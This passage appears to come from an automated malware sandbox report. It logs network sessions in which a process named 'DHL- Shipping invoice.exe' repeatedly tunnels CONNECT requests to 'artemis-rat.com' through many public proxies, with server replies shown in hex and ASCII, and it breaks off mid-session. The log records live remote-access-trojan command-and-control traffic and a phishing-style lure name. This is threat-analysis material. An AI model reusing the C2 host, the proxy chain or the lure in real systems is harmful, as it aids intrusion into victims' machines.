                            Mar 12, 2024 08:37:02.656955957 CET306INData Raw: 28 03 00 1d 20 da 5d 95 68 11 bf d6 e4 b0 7c 12 b7 7a 7e 02 66 44 f5 6b 40 79 0a 40 82 60 38 6e 32 50 f5 d5 5c 08 04 01 00 3e 21 4a 84 9b 77 5b c1 69 2b f0 25 c3 d3 45 14 f5 6d c8 0d 53 74 88 28 27 74 3a b5 34 12 a6 d1 d1 04 e9 33 03 84 05 fb 13
                            Data Ascii: ( ]h|z~fDk@y@`8n2P\>!Jw[i+%EmSt('t:43}_'K`+xbE'Czpw?_e[bA\(_K \eE?G6R;n2|`[>6o(\@'0h]F##CT!<O


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            793192.168.2.449969162.144.79.9728776484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.927704096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.046749115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            794192.168.2.452453119.196.168.183806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.929812908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.208030939 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                            Mar 12, 2024 08:37:02.800455093 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            795192.168.2.45257762.33.53.24831286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.936845064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.562463045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.133265018 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            796192.168.2.452318117.160.250.13088996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.945641041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.840730906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.300643921 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            797192.168.2.452358103.49.114.19580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.947853088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            798192.168.2.452440219.243.212.11880806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.949403048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.294945955 CET22INHTTP/1.1 502 ERROR


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            799192.168.2.451833192.111.134.1041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.950614929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            800192.168.2.452451116.62.147.24931286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.965221882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.281542063 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            801192.168.2.45260152.151.210.20490006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.971941948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            802192.168.2.452456123.126.158.50806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.977503061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            803192.168.2.45248239.105.27.3031286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:01.978722095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.280284882 CET38INHTTP/1.1 200 OK
                            content-length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            804192.168.2.45262545.14.174.180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.029189110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.118323088 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            805192.168.2.452483183.215.23.24290916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.029635906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.374502897 CET325INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.1
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            806192.168.2.452495120.79.101.088886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.030194998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.365192890 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            807192.168.2.452663159.89.238.13880006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.030766964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.120157003 CET32INHTTP/1.0 504 Gateway Timeout


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            808192.168.2.452470150.107.136.11080826484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.033957005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            809192.168.2.452638104.16.106.65806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.034151077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.121437073 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            810192.168.2.45266538.54.95.1990806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.034152985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.130893946 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:04.638549089 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:05.246536970 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:06.462428093 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:09.086478949 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:13.950314045 CET39INHTTP/1.1 200 Connection established
                            Mar 12, 2024 08:37:23.678558111 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            811192.168.2.452515103.23.101.9741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.035829067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            812192.168.2.45265438.162.31.6231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.035834074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.347168922 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            813192.168.2.449912183.96.235.105185726484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.035922050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.062619925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.063023090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.062788963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.062535048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:38.062272072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.960275888 CET39INHTTP/1.0 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            814192.168.2.45260298.162.25.4316546484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.038646936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            815192.168.2.452694129.213.150.205806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.049983978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
